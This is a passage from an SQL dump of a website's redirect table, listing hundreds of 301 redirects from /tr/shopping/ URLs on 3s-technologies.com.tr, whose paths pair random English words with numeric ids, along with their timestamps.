05:50:33','0000-00-00 00:00:00',301),(73569,'https://3s-technologies.com.tr/tr/shopping/globularly/3126186952.html',NULL,'https://3s-technologies.com.tr/shopping/globularly/3126186952.html','',1,0,'2026-06-11 05:50:36','0000-00-00 00:00:00',301),(73570,'https://3s-technologies.com.tr/tr/shopping/impregn/1449917706.html',NULL,'https://3s-technologies.com.tr/shopping/impregn/1449917706.html','',1,0,'2026-06-11 05:50:39','0000-00-00 00:00:00',301),(73571,'https://3s-technologies.com.tr/tr/shopping/overpress/2161344540.html',NULL,'https://3s-technologies.com.tr/shopping/overpress/2161344540.html','',1,0,'2026-06-11 05:50:43','0000-00-00 00:00:00',301),(73572,'https://3s-technologies.com.tr/tr/shopping/misedition/1027013287.html',NULL,'https://3s-technologies.com.tr/shopping/misedition/1027013287.html','',1,0,'2026-06-11 05:50:45','0000-00-00 00:00:00',301),(73573,'https://3s-technologies.com.tr/tr/shopping/sectarism/4274535636.html',NULL,'https://3s-technologies.com.tr/shopping/sectarism/4274535636.html','',1,0,'2026-06-11 05:50:48','0000-00-00 00:00:00',301),(73574,'https://3s-technologies.com.tr/tr/shopping/fubbery/2067447447.html',NULL,'https://3s-technologies.com.tr/shopping/fubbery/2067447447.html','',1,0,'2026-06-11 05:50:51','0000-00-00 00:00:00',301),(73575,'https://3s-technologies.com.tr/tr/shopping/securement/3632506713.html',NULL,'https://3s-technologies.com.tr/shopping/securement/3632506713.html','',1,0,'2026-06-11 05:50:54','0000-00-00 00:00:00',301),(73576,'https://3s-technologies.com.tr/tr/shopping/coliseum/4292495640.html',NULL,'https://3s-technologies.com.tr/shopping/coliseum/4292495640.html','',1,0,'2026-06-11 05:50:57','0000-00-00 00:00:00',301),(73577,'https://3s-technologies.com.tr/tr/shopping/unability/1472370429.html',NULL,'https://3s-technologies.com.tr/shopping/unability/1472370429.html','',1,0,'2026-06-11 05:51:00','0000-00-00 00:00:00',301),(73578,'https://3s-technologies.com.tr/tr/shopping/tapis/831832940.html',NULL,'https://3s-technologies.com.tr/shopping/tapis/831832940.html','',1,0,'2026-06-11 05:51:03','0000-00-00 00:00:00',301),(73579,'https://3s-technologies.com.tr/tr/shopping/packer/1898797531.html',NULL,'https://3s-technologies.com.tr/shopping/packer/1898797531.html','',1,0,'2026-06-11 05:51:06','0000-00-00 00:00:00',301),(73580,'https://3s-technologies.com.tr/tr/shopping/glare/478971216.html',NULL,'https://3s-technologies.com.tr/shopping/glare/478971216.html','',1,0,'2026-06-11 05:51:09','0000-00-00 00:00:00',301),(73581,'https://3s-technologies.com.tr/tr/shopping/dyaus/3980843353.html',NULL,'https://3s-technologies.com.tr/shopping/dyaus/3980843353.html','',1,0,'2026-06-11 05:51:12','0000-00-00 00:00:00',301),(73582,'https://3s-technologies.com.tr/tr/shopping/crewelwork/2813204451.html',NULL,'https://3s-technologies.com.tr/shopping/crewelwork/2813204451.html','',1,0,'2026-06-11 05:51:15','0000-00-00 00:00:00',301),(73583,'https://3s-technologies.com.tr/tr/shopping/selfsuspicious/4069061683.html',NULL,'https://3s-technologies.com.tr/shopping/selfsuspicious/4069061683.html','',1,0,'2026-06-11 05:51:18','0000-00-00 00:00:00',301),(73584,'https://3s-technologies.com.tr/tr/shopping/sagapenum/4135169578.html',NULL,'https://3s-technologies.com.tr/shopping/sagapenum/4135169578.html','',1,0,'2026-06-11 05:51:21','0000-00-00 00:00:00',301),(73585,'https://3s-technologies.com.tr/tr/shopping/synopses/619179408.html',NULL,'https://3s-technologies.com.tr/shopping/synopses/619179408.html','',1,0,'2026-06-11 05:51:24','0000-00-00 00:00:00',301),(73586,'https://3s-technologies.com.tr/tr/shopping/commiseration/3520018627.html',NULL,'https://3s-technologies.com.tr/shopping/commiseration/3520018627.html','',1,0,'2026-06-11 05:51:27','0000-00-00 00:00:00',301),(73587,'https://3s-technologies.com.tr/tr/shopping/sappar/568213499.html',NULL,'https://3s-technologies.com.tr/shopping/sappar/568213499.html','',1,0,'2026-06-11 05:51:30','0000-00-00 00:00:00',301),(73588,'https://3s-technologies.com.tr/tr/shopping/prolepsis/449064096.html',NULL,'https://3s-technologies.com.tr/shopping/prolepsis/449064096.html','',1,0,'2026-06-11 05:51:33','0000-00-00 00:00:00',301),(73589,'https://3s-technologies.com.tr/tr/shopping/tozing/3983267567.html',NULL,'https://3s-technologies.com.tr/shopping/tozing/3983267567.html','',1,0,'2026-06-11 05:51:36','0000-00-00 00:00:00',301),(73590,'https://3s-technologies.com.tr/tr/shopping/fracturing/1524157671.html',NULL,'https://3s-technologies.com.tr/shopping/fracturing/1524157671.html','',1,0,'2026-06-11 05:51:39','0000-00-00 00:00:00',301),(73591,'https://3s-technologies.com.tr/tr/shopping/foolhardily/3965307563.html',NULL,'https://3s-technologies.com.tr/shopping/foolhardily/3965307563.html','',1,0,'2026-06-11 05:51:42','0000-00-00 00:00:00',301),(73592,'https://3s-technologies.com.tr/tr/shopping/warluck/190206353.html',NULL,'https://3s-technologies.com.tr/shopping/warluck/190206353.html','',1,0,'2026-06-11 05:51:45','0000-00-00 00:00:00',301),(73593,'https://3s-technologies.com.tr/tr/shopping/limber/188032360.html',NULL,'https://3s-technologies.com.tr/shopping/limber/188032360.html','',1,0,'2026-06-11 05:51:50','0000-00-00 00:00:00',301),(73594,'https://3s-technologies.com.tr/tr/shopping/malecontent/1207694715.html',NULL,'https://3s-technologies.com.tr/shopping/malecontent/1207694715.html','',1,0,'2026-06-11 05:51:52','0000-00-00 00:00:00',301),(73595,'https://3s-technologies.com.tr/tr/shopping/excelsa/2358698880.html',NULL,'https://3s-technologies.com.tr/shopping/excelsa/2358698880.html','',1,0,'2026-06-11 05:51:56','0000-00-00 00:00:00',301),(73596,'https://3s-technologies.com.tr/tr/shopping/imperspicuous/658987169.html',NULL,'https://3s-technologies.com.tr/shopping/imperspicuous/658987169.html','',1,0,'2026-06-11 05:51:59','0000-00-00 00:00:00',301),(73597,'https://3s-technologies.com.tr/tr/shopping/repour/2773137082.html',NULL,'https://3s-technologies.com.tr/shopping/repour/2773137082.html','',1,0,'2026-06-11 05:52:01','0000-00-00 00:00:00',301),(73598,'https://3s-technologies.com.tr/tr/shopping/brackishness/2269810909.html',NULL,'https://3s-technologies.com.tr/shopping/brackishness/2269810909.html','',1,0,'2026-06-11 05:52:05','0000-00-00 00:00:00',301),(73599,'https://3s-technologies.com.tr/tr/shopping/brachial/847985282.html',NULL,'https://3s-technologies.com.tr/shopping/brachial/847985282.html','',1,0,'2026-06-11 05:52:08','0000-00-00 00:00:00',301),(73600,'https://3s-technologies.com.tr/tr/shopping/soyned/1900962105.html',NULL,'https://3s-technologies.com.tr/shopping/soyned/1900962105.html','',1,0,'2026-06-11 05:52:11','0000-00-00 00:00:00',301),(73601,'https://3s-technologies.com.tr/tr/shopping/unhelm/424524820.html',NULL,'https://3s-technologies.com.tr/shopping/unhelm/424524820.html','',1,0,'2026-06-11 05:52:14','0000-00-00 00:00:00',301),(73602,'https://3s-technologies.com.tr/tr/shopping/triandra/2002838635.html',NULL,'https://3s-technologies.com.tr/shopping/triandra/2002838635.html','',1,0,'2026-06-11 05:52:17','0000-00-00 00:00:00',301),(73603,'https://3s-technologies.com.tr/tr/shopping/cretin/2968090218.html',NULL,'https://3s-technologies.com.tr/shopping/cretin/2968090218.html','',1,0,'2026-06-11 05:52:20','0000-00-00 00:00:00',301),(73604,'https://3s-technologies.com.tr/tr/shopping/glairing/1207798497.html',NULL,'https://3s-technologies.com.tr/shopping/glairing/1207798497.html','',1,0,'2026-06-11 05:52:23','0000-00-00 00:00:00',301),(73605,'https://3s-technologies.com.tr/tr/shopping/violaceus/3757594472.html',NULL,'https://3s-technologies.com.tr/shopping/violaceus/3757594472.html','',1,0,'2026-06-11 05:52:26','0000-00-00 00:00:00',301),(73606,'https://3s-technologies.com.tr/tr/shopping/pelted/3045943502.html',NULL,'https://3s-technologies.com.tr/shopping/pelted/3045943502.html','',1,0,'2026-06-11 05:52:29','0000-00-00 00:00:00',301),(73607,'https://3s-technologies.com.tr/tr/shopping/hematoglobulin/2962289331.html',NULL,'https://3s-technologies.com.tr/shopping/hematoglobulin/2962289331.html','',1,0,'2026-06-11 05:52:35','0000-00-00 00:00:00',301),(73608,'https://3s-technologies.com.tr/tr/shopping/jactancy/2198824188.html',NULL,'https://3s-technologies.com.tr/shopping/jactancy/2198824188.html','',1,0,'2026-06-11 05:52:38','0000-00-00 00:00:00',301),(73609,'https://3s-technologies.com.tr/tr/shopping/stumble/952286487.html',NULL,'https://3s-technologies.com.tr/shopping/stumble/952286487.html','',1,0,'2026-06-11 05:52:41','0000-00-00 00:00:00',301),(73610,'https://3s-technologies.com.tr/tr/shopping/tediously/3343959690.html',NULL,'https://3s-technologies.com.tr/shopping/tediously/3343959690.html','',1,0,'2026-06-11 05:52:44','0000-00-00 00:00:00',301),(73611,'https://3s-technologies.com.tr/tr/shopping/laminable/2578356011.html',NULL,'https://3s-technologies.com.tr/shopping/laminable/2578356011.html','',1,0,'2026-06-11 05:52:47','0000-00-00 00:00:00',301),(73612,'https://3s-technologies.com.tr/tr/shopping/underlip/1979229133.html',NULL,'https://3s-technologies.com.tr/shopping/underlip/1979229133.html','',1,0,'2026-06-11 05:52:50','0000-00-00 00:00:00',301),(73613,'https://3s-technologies.com.tr/tr/shopping/ventage/1453457934.html',NULL,'https://3s-technologies.com.tr/shopping/ventage/1453457934.html','',1,0,'2026-06-11 05:52:53','0000-00-00 00:00:00',301),(73614,'https://3s-technologies.com.tr/tr/shopping/drillmaster/2793079873.html',NULL,'https://3s-technologies.com.tr/shopping/drillmaster/2793079873.html','',1,0,'2026-06-11 05:52:56','0000-00-00 00:00:00',301),(73615,'https://3s-technologies.com.tr/tr/shopping/limnocryptes/3971271957.html',NULL,'https://3s-technologies.com.tr/shopping/limnocryptes/3971271957.html','',1,0,'2026-06-11 05:52:59','0000-00-00 00:00:00',301),(73616,'https://3s-technologies.com.tr/tr/shopping/infirmative/964061171.html',NULL,'https://3s-technologies.com.tr/shopping/infirmative/964061171.html','',1,0,'2026-06-11 05:53:02','0000-00-00 00:00:00',301),(73617,'https://3s-technologies.com.tr/tr/shopping/seavy/4130580790.html',NULL,'https://3s-technologies.com.tr/shopping/seavy/4130580790.html','',1,0,'2026-06-11 05:53:05','0000-00-00 00:00:00',301),(73618,'https://3s-technologies.com.tr/tr/shopping/macarellus/776073414.html',NULL,'https://3s-technologies.com.tr/shopping/macarellus/776073414.html','',1,0,'2026-06-11 05:53:08','0000-00-00 00:00:00',301),(73619,'https://3s-technologies.com.tr/tr/shopping/windier/3725541074.html',NULL,'https://3s-technologies.com.tr/shopping/windier/3725541074.html','',1,0,'2026-06-11 05:53:11','0000-00-00 00:00:00',301),(73620,'https://3s-technologies.com.tr/tr/shopping/trooping/3389782538.html',NULL,'https://3s-technologies.com.tr/shopping/trooping/3389782538.html','',1,0,'2026-06-11 05:53:14','0000-00-00 00:00:00',301),(73621,'https://3s-technologies.com.tr/tr/shopping/sesterce/1354451466.html',NULL,'https://3s-technologies.com.tr/shopping/sesterce/1354451466.html','',1,0,'2026-06-11 05:53:17','0000-00-00 00:00:00',301),(73622,'https://3s-technologies.com.tr/tr/shopping/fuchsin/4226166835.html',NULL,'https://3s-technologies.com.tr/shopping/fuchsin/4226166835.html','',1,0,'2026-06-11 05:53:20','0000-00-00 00:00:00',301),(73623,'https://3s-technologies.com.tr/tr/shopping/reparel/2299758107.html',NULL,'https://3s-technologies.com.tr/shopping/reparel/2299758107.html','',1,0,'2026-06-11 05:53:23','0000-00-00 00:00:00',301),(73624,'https://3s-technologies.com.tr/tr/shopping/acicularly/1206586398.html',NULL,'https://3s-technologies.com.tr/shopping/acicularly/1206586398.html','',1,0,'2026-06-11 05:53:27','0000-00-00 00:00:00',301),(73625,'https://3s-technologies.com.tr/tr/shopping/timour/1331628749.html',NULL,'https://3s-technologies.com.tr/shopping/timour/1331628749.html','',1,0,'2026-06-11 05:53:29','0000-00-00 00:00:00',301),(73626,'https://3s-technologies.com.tr/tr/shopping/simpai/1045484355.html',NULL,'https://3s-technologies.com.tr/shopping/simpai/1045484355.html','',1,0,'2026-06-11 05:53:32','0000-00-00 00:00:00',301),(73627,'https://3s-technologies.com.tr/tr/shopping/destinate/1974640329.html',NULL,'https://3s-technologies.com.tr/shopping/destinate/1974640329.html','',1,0,'2026-06-11 05:53:35','0000-00-00 00:00:00',301),(73628,'https://3s-technologies.com.tr/tr/shopping/uphoard/1526581885.html',NULL,'https://3s-technologies.com.tr/shopping/uphoard/1526581885.html','',1,0,'2026-06-11 05:53:38','0000-00-00 00:00:00',301),(73629,'https://3s-technologies.com.tr/tr/shopping/aurigraphy/415057206.html',NULL,'https://3s-technologies.com.tr/shopping/aurigraphy/415057206.html','',1,0,'2026-06-11 05:53:41','0000-00-00 00:00:00',301),(73630,'https://3s-technologies.com.tr/tr/shopping/piper/1066821048.html',NULL,'https://3s-technologies.com.tr/shopping/piper/1066821048.html','',1,0,'2026-06-11 05:53:47','0000-00-00 00:00:00',301),(73631,'https://3s-technologies.com.tr/tr/shopping/comparer/3082520997.html',NULL,'https://3s-technologies.com.tr/shopping/comparer/3082520997.html','',1,0,'2026-06-11 05:53:49','0000-00-00 00:00:00',301),(73632,'https://3s-technologies.com.tr/tr/shopping/angio/390256155.html',NULL,'https://3s-technologies.com.tr/shopping/angio/390256155.html','',1,0,'2026-06-11 05:53:52','0000-00-00 00:00:00',301),(73633,'https://3s-technologies.com.tr/tr/shopping/respecter/1048870447.html',NULL,'https://3s-technologies.com.tr/shopping/respecter/1048870447.html','',1,0,'2026-06-11 05:53:55','0000-00-00 00:00:00',301),(73634,'https://3s-technologies.com.tr/tr/shopping/manysided/2640001633.html',NULL,'https://3s-technologies.com.tr/shopping/manysided/2640001633.html','',1,0,'2026-06-11 05:53:58','0000-00-00 00:00:00',301),(73635,'https://3s-technologies.com.tr/tr/shopping/connature/680597803.html',NULL,'https://3s-technologies.com.tr/shopping/connature/680597803.html','',1,0,'2026-06-11 05:54:01','0000-00-00 00:00:00',301),(73636,'https://3s-technologies.com.tr/tr/shopping/inauguration/2135950229.html',NULL,'https://3s-technologies.com.tr/shopping/inauguration/2135950229.html','',1,0,'2026-06-11 05:54:04','0000-00-00 00:00:00',301),(73637,'https://3s-technologies.com.tr/tr/shopping/plating/2621192904.html',NULL,'https://3s-technologies.com.tr/shopping/plating/2621192904.html','',1,0,'2026-06-11 05:54:07','0000-00-00 00:00:00',301),(73638,'https://3s-technologies.com.tr/tr/shopping/biflorate/4182549883.html',NULL,'https://3s-technologies.com.tr/shopping/biflorate/4182549883.html','',1,0,'2026-06-11 05:54:10','0000-00-00 00:00:00',301),(73639,'https://3s-technologies.com.tr/tr/shopping/logarithm/3914341638.html',NULL,'https://3s-technologies.com.tr/shopping/logarithm/3914341638.html','',1,0,'2026-06-11 05:54:13','0000-00-00 00:00:00',301),(73640,'https://3s-technologies.com.tr/tr/shopping/cumbersomely/4222780759.html',NULL,'https://3s-technologies.com.tr/shopping/cumbersomely/4222780759.html','',1,0,'2026-06-11 05:54:16','0000-00-00 00:00:00',301),(73641,'https://3s-technologies.com.tr/tr/shopping/propitiating/39065611.html',NULL,'https://3s-technologies.com.tr/shopping/propitiating/39065611.html','',1,0,'2026-06-11 05:54:19','0000-00-00 00:00:00',301),(73642,'https://3s-technologies.com.tr/tr/shopping/symptom/2117201257.html',NULL,'https://3s-technologies.com.tr/shopping/symptom/2117201257.html','',1,0,'2026-06-11 05:54:22','0000-00-00 00:00:00',301),(73643,'https://3s-technologies.com.tr/tr/shopping/alkalization/3998361930.html',NULL,'https://3s-technologies.com.tr/shopping/alkalization/3998361930.html','',1,0,'2026-06-11 05:54:25','0000-00-00 00:00:00',301),(73644,'https://3s-technologies.com.tr/tr/shopping/crypts/1994159973.html',NULL,'https://3s-technologies.com.tr/shopping/crypts/1994159973.html','',1,0,'2026-06-11 05:54:29','0000-00-00 00:00:00',301),(73645,'https://3s-technologies.com.tr/tr/shopping/chickaree/242374974.html',NULL,'https://3s-technologies.com.tr/shopping/chickaree/242374974.html','',1,0,'2026-06-11 05:54:32','0000-00-00 00:00:00',301),(73646,'https://3s-technologies.com.tr/tr/shopping/reprobating/2739689750.html',NULL,'https://3s-technologies.com.tr/shopping/reprobating/2739689750.html','',1,0,'2026-06-11 05:54:34','0000-00-00 00:00:00',301),(73647,'https://3s-technologies.com.tr/tr/shopping/flang/220267593.html',NULL,'https://3s-technologies.com.tr/shopping/flang/220267593.html','',1,0,'2026-06-11 05:54:37','0000-00-00 00:00:00',301),(73648,'https://3s-technologies.com.tr/tr/shopping/fipple/3806817864.html',NULL,'https://3s-technologies.com.tr/shopping/fipple/3806817864.html','',1,0,'2026-06-11 05:54:40','0000-00-00 00:00:00',301),(73649,'https://3s-technologies.com.tr/tr/shopping/firedamp/3734882173.html',NULL,'https://3s-technologies.com.tr/shopping/firedamp/3734882173.html','',1,0,'2026-06-11 05:54:43','0000-00-00 00:00:00',301),(73650,'https://3s-technologies.com.tr/tr/shopping/sinistrously/1680343096.html',NULL,'https://3s-technologies.com.tr/shopping/sinistrously/1680343096.html','',1,0,'2026-06-11 05:54:47','0000-00-00 00:00:00',301),(73651,'https://3s-technologies.com.tr/tr/shopping/andes/3740846567.html',NULL,'https://3s-technologies.com.tr/shopping/andes/3740846567.html','',1,0,'2026-06-11 05:54:50','0000-00-00 00:00:00',301),(73652,'https://3s-technologies.com.tr/tr/shopping/sufflate/884010932.html',NULL,'https://3s-technologies.com.tr/shopping/sufflate/884010932.html','',1,0,'2026-06-11 05:54:53','0000-00-00 00:00:00',301),(73653,'https://3s-technologies.com.tr/tr/shopping/blaring/3890626171.html',NULL,'https://3s-technologies.com.tr/shopping/blaring/3890626171.html','',1,0,'2026-06-11 05:54:56','0000-00-00 00:00:00',301),(73654,'https://3s-technologies.com.tr/tr/shopping/silentious/2019251078.html',NULL,'https://3s-technologies.com.tr/shopping/silentious/2019251078.html','',1,0,'2026-06-11 05:54:59','0000-00-00 00:00:00',301),(73655,'https://3s-technologies.com.tr/tr/shopping/unpay/1708596706.html',NULL,'https://3s-technologies.com.tr/shopping/unpay/1708596706.html','',1,0,'2026-06-11 05:55:02','0000-00-00 00:00:00',301),(73656,'https://3s-technologies.com.tr/tr/shopping/prosier/272054851.html',NULL,'https://3s-technologies.com.tr/shopping/prosier/272054851.html','',1,0,'2026-06-11 05:55:05','0000-00-00 00:00:00',301),(73657,'https://3s-technologies.com.tr/tr/shopping/zymome/2810780269.html',NULL,'https://3s-technologies.com.tr/shopping/zymome/2810780269.html','',1,0,'2026-06-11 05:55:08','0000-00-00 00:00:00',301),(73658,'https://3s-technologies.com.tr/tr/shopping/streamline/3882497155.html',NULL,'https://3s-technologies.com.tr/shopping/streamline/3882497155.html','',1,0,'2026-06-11 05:55:11','0000-00-00 00:00:00',301),(73659,'https://3s-technologies.com.tr/tr/shopping/sapadillo/810332708.html',NULL,'https://3s-technologies.com.tr/shopping/sapadillo/810332708.html','',1,0,'2026-06-11 05:55:14','0000-00-00 00:00:00',301),(73660,'https://3s-technologies.com.tr/tr/shopping/exhumation/801037017.html',NULL,'https://3s-technologies.com.tr/shopping/exhumation/801037017.html','',1,0,'2026-06-11 05:55:17','0000-00-00 00:00:00',301),(73661,'https://3s-technologies.com.tr/tr/shopping/osteolytic/2847636671.html',NULL,'https://3s-technologies.com.tr/shopping/osteolytic/2847636671.html','',1,0,'2026-06-11 05:55:20','0000-00-00 00:00:00',301),(73662,'https://3s-technologies.com.tr/tr/shopping/uberous/4271158947.html',NULL,'https://3s-technologies.com.tr/shopping/uberous/4271158947.html','',1,0,'2026-06-11 05:55:23','0000-00-00 00:00:00',301),(73663,'https://3s-technologies.com.tr/tr/shopping/concocter/4276959834.html',NULL,'https://3s-technologies.com.tr/shopping/concocter/4276959834.html','',1,0,'2026-06-11 05:55:26','0000-00-00 00:00:00',301),(73664,'https://3s-technologies.com.tr/tr/shopping/coniform/2617556623.html',NULL,'https://3s-technologies.com.tr/shopping/coniform/2617556623.html','',1,0,'2026-06-11 05:55:29','0000-00-00 00:00:00',301),(73665,'https://3s-technologies.com.tr/tr/shopping/informing/536508684.html',NULL,'https://3s-technologies.com.tr/shopping/informing/536508684.html','',1,0,'2026-06-11 05:55:32','0000-00-00 00:00:00',301),(73666,'https://3s-technologies.com.tr/tr/shopping/piece/2168357510.html',NULL,'https://3s-technologies.com.tr/shopping/piece/2168357510.html','',1,0,'2026-06-11 05:55:35','0000-00-00 00:00:00',301),(73667,'https://3s-technologies.com.tr/tr/shopping/discussing/3004521290.html',NULL,'https://3s-technologies.com.tr/shopping/discussing/3004521290.html','',1,0,'2026-06-11 05:55:38','0000-00-00 00:00:00',301),(73668,'https://3s-technologies.com.tr/tr/shopping/biotic/3661627064.html',NULL,'https://3s-technologies.com.tr/shopping/biotic/3661627064.html','',1,0,'2026-06-11 05:55:41','0000-00-00 00:00:00',301),(73669,'https://3s-technologies.com.tr/tr/shopping/inefficiency/1505686619.html',NULL,'https://3s-technologies.com.tr/shopping/inefficiency/1505686619.html','',1,0,'2026-06-11 05:55:44','0000-00-00 00:00:00',301),(73670,'https://3s-technologies.com.tr/tr/shopping/vibratiuncle/3604038919.html',NULL,'https://3s-technologies.com.tr/shopping/vibratiuncle/3604038919.html','',1,0,'2026-06-11 05:55:47','0000-00-00 00:00:00',301),(73671,'https://3s-technologies.com.tr/tr/shopping/horrisonant/3515429855.html',NULL,'https://3s-technologies.com.tr/shopping/horrisonant/3515429855.html','',1,0,'2026-06-11 05:55:50','0000-00-00 00:00:00',301),(73672,'https://3s-technologies.com.tr/tr/shopping/pneumonometer/3895429143.html',NULL,'https://3s-technologies.com.tr/shopping/pneumonometer/3895429143.html','',1,0,'2026-06-11 05:55:53','0000-00-00 00:00:00',301),(73673,'https://3s-technologies.com.tr/tr/shopping/emblement/1847617422.html',NULL,'https://3s-technologies.com.tr/shopping/emblement/1847617422.html','',1,0,'2026-06-11 05:55:59','0000-00-00 00:00:00',301),(73674,'https://3s-technologies.com.tr/tr/shopping/vulvitis/3956737136.html',NULL,'https://3s-technologies.com.tr/shopping/vulvitis/3956737136.html','',1,0,'2026-06-11 05:56:01','0000-00-00 00:00:00',301),(73675,'https://3s-technologies.com.tr/tr/shopping/starvedly/4230139103.html',NULL,'https://3s-technologies.com.tr/shopping/starvedly/4230139103.html','',1,0,'2026-06-11 05:56:04','0000-00-00 00:00:00',301),(73676,'https://3s-technologies.com.tr/tr/shopping/fermentativeness/2506444159.html',NULL,'https://3s-technologies.com.tr/shopping/fermentativeness/2506444159.html','',1,0,'2026-06-11 05:56:06','0000-00-00 00:00:00',301),(73677,'https://3s-technologies.com.tr/tr/shopping/baryon/3084952908.html',NULL,'https://3s-technologies.com.tr/shopping/baryon/3084952908.html','',1,0,'2026-06-11 05:56:10','0000-00-00 00:00:00',301),(73678,'https://3s-technologies.com.tr/tr/shopping/boozedup/2497103044.html',NULL,'https://3s-technologies.com.tr/shopping/boozedup/2497103044.html','',1,0,'2026-06-11 05:56:12','0000-00-00 00:00:00',301),(73679,'https://3s-technologies.com.tr/tr/shopping/withdraw/1595248190.html',NULL,'https://3s-technologies.com.tr/shopping/withdraw/1595248190.html','',1,0,'2026-06-11 05:56:16','0000-00-00 00:00:00',301),(73680,'https://3s-technologies.com.tr/tr/shopping/foreadmonish/1995372072.html',NULL,'https://3s-technologies.com.tr/shopping/foreadmonish/1995372072.html','',1,0,'2026-06-11 05:56:18','0000-00-00 00:00:00',301),(73681,'https://3s-technologies.com.tr/tr/shopping/smock/1259489654.html',NULL,'https://3s-technologies.com.tr/shopping/smock/1259489654.html','',1,0,'2026-06-11 05:56:21','0000-00-00 00:00:00',301),(73682,'https://3s-technologies.com.tr/tr/shopping/viduation/1427810341.html',NULL,'https://3s-technologies.com.tr/shopping/viduation/1427810341.html','',1,0,'2026-06-11 05:56:24','0000-00-00 00:00:00',301),(73683,'https://3s-technologies.com.tr/tr/shopping/cerasin/925030792.html',NULL,'https://3s-technologies.com.tr/shopping/cerasin/925030792.html','',1,0,'2026-06-11 05:56:27','0000-00-00 00:00:00',301),(73684,'https://3s-technologies.com.tr/tr/shopping/selfish/2849801261.html',NULL,'https://3s-technologies.com.tr/shopping/selfish/2849801261.html','',1,0,'2026-06-11 05:56:30','0000-00-00 00:00:00',301),(73685,'https://3s-technologies.com.tr/tr/shopping/solisequious/2233483603.html',NULL,'https://3s-technologies.com.tr/shopping/solisequious/2233483603.html','',1,0,'2026-06-11 05:56:34','0000-00-00 00:00:00',301),(73686,'https://3s-technologies.com.tr/tr/shopping/counteracting/2937034719.html',NULL,'https://3s-technologies.com.tr/shopping/counteracting/2937034719.html','',1,0,'2026-06-11 05:56:36','0000-00-00 00:00:00',301),(73687,'https://3s-technologies.com.tr/tr/shopping/exuve/3275293385.html',NULL,'https://3s-technologies.com.tr/shopping/exuve/3275293385.html','',1,0,'2026-06-11 05:56:39','0000-00-00 00:00:00',301),(73688,'https://3s-technologies.com.tr/tr/shopping/scaroid/3456284269.html',NULL,'https://3s-technologies.com.tr/shopping/scaroid/3456284269.html','',1,0,'2026-06-11 05:56:43','0000-00-00 00:00:00',301),(73689,'https://3s-technologies.com.tr/tr/shopping/aggressively/2269914675.html',NULL,'https://3s-technologies.com.tr/shopping/aggressively/2269914675.html','',1,0,'2026-06-11 05:56:45','0000-00-00 00:00:00',301),(73690,'https://3s-technologies.com.tr/tr/shopping/exegetist/1949763440.html',NULL,'https://3s-technologies.com.tr/shopping/exegetist/1949763440.html','',1,0,'2026-06-11 05:56:48','0000-00-00 00:00:00',301),(73691,'https://3s-technologies.com.tr/tr/shopping/channel/113532787.html',NULL,'https://3s-technologies.com.tr/shopping/channel/113532787.html','',1,0,'2026-06-11 05:56:51','0000-00-00 00:00:00',301),(73692,'https://3s-technologies.com.tr/tr/shopping/instanter/1638718302.html',NULL,'https://3s-technologies.com.tr/shopping/instanter/1638718302.html','',1,0,'2026-06-11 05:57:01','0000-00-00 00:00:00',301),(73693,'https://3s-technologies.com.tr/tr/shopping/iodine/3307528618.html',NULL,'https://3s-technologies.com.tr/shopping/iodine/3307528618.html','',1,0,'2026-06-11 05:57:03','0000-00-00 00:00:00',301),(73694,'https://3s-technologies.com.tr/tr/shopping/dysphoric/2624569593.html',NULL,'https://3s-technologies.com.tr/shopping/dysphoric/2624569593.html','',1,0,'2026-06-11 05:57:06','0000-00-00 00:00:00',301),(73695,'https://3s-technologies.com.tr/tr/shopping/bastard/3608627723.html',NULL,'https://3s-technologies.com.tr/shopping/bastard/3608627723.html','',1,0,'2026-06-11 05:57:09','0000-00-00 00:00:00',301),(73696,'https://3s-technologies.com.tr/tr/shopping/automaton/1434727242.html',NULL,'https://3s-technologies.com.tr/shopping/automaton/1434727242.html','',1,0,'2026-06-11 05:57:12','0000-00-00 00:00:00',301),(73697,'https://3s-technologies.com.tr/tr/shopping/hestern/4033842710.html',NULL,'https://3s-technologies.com.tr/shopping/hestern/4033842710.html','',1,0,'2026-06-11 05:57:15','0000-00-00 00:00:00',301),(73698,'https://3s-technologies.com.tr/tr/shopping/allottee/3538749303.html',NULL,'https://3s-technologies.com.tr/shopping/allottee/3538749303.html','',1,0,'2026-06-11 05:57:18','0000-00-00 00:00:00',301),(73699,'https://3s-technologies.com.tr/tr/shopping/slayer/4266406652.html',NULL,'https://3s-technologies.com.tr/shopping/slayer/4266406652.html','',1,0,'2026-06-11 05:57:21','0000-00-00 00:00:00',301),(73700,'https://3s-technologies.com.tr/tr/shopping/intransmissible/1024425582.html',NULL,'https://3s-technologies.com.tr/shopping/intransmissible/1024425582.html','',1,0,'2026-06-11 05:57:24','0000-00-00 00:00:00',301),(73701,'https://3s-technologies.com.tr/tr/shopping/boroglyceride/3090967995.html',NULL,'https://3s-technologies.com.tr/shopping/boroglyceride/3090967995.html','',1,0,'2026-06-11 05:57:27','0000-00-00 00:00:00',301),(73702,'https://3s-technologies.com.tr/tr/shopping/suberose/3926059344.html',NULL,'https://3s-technologies.com.tr/shopping/suberose/3926059344.html','',1,0,'2026-06-11 05:57:30','0000-00-00 00:00:00',301),(73703,'https://3s-technologies.com.tr/tr/shopping/vacuolation/1650272453.html',NULL,'https://3s-technologies.com.tr/shopping/vacuolation/1650272453.html','',1,0,'2026-06-11 05:57:33','0000-00-00 00:00:00',301),(73704,'https://3s-technologies.com.tr/tr/shopping/globicephalus/1063280836.html',NULL,'https://3s-technologies.com.tr/shopping/globicephalus/1063280836.html','',1,0,'2026-06-11 05:57:36','0000-00-00 00:00:00',301),(73705,'https://3s-technologies.com.tr/tr/shopping/brangler/4202492658.html',NULL,'https://3s-technologies.com.tr/shopping/brangler/4202492658.html','',1,0,'2026-06-11 05:57:39','0000-00-00 00:00:00',301),(73706,'https://3s-technologies.com.tr/tr/shopping/trant/364482063.html',NULL,'https://3s-technologies.com.tr/shopping/trant/364482063.html','',1,0,'2026-06-11 05:57:42','0000-00-00 00:00:00',301),(73707,'https://3s-technologies.com.tr/tr/shopping/grunting/289755263.html',NULL,'https://3s-technologies.com.tr/shopping/grunting/289755263.html','',1,0,'2026-06-11 05:57:46','0000-00-00 00:00:00',301),(73708,'https://3s-technologies.com.tr/tr/shopping/ferrocalcite/3752842177.html',NULL,'https://3s-technologies.com.tr/shopping/ferrocalcite/3752842177.html','',1,0,'2026-06-11 05:57:48','0000-00-00 00:00:00',301),(73709,'https://3s-technologies.com.tr/tr/shopping/withers/731062544.html',NULL,'https://3s-technologies.com.tr/shopping/withers/731062544.html','',1,0,'2026-06-11 05:57:51','0000-00-00 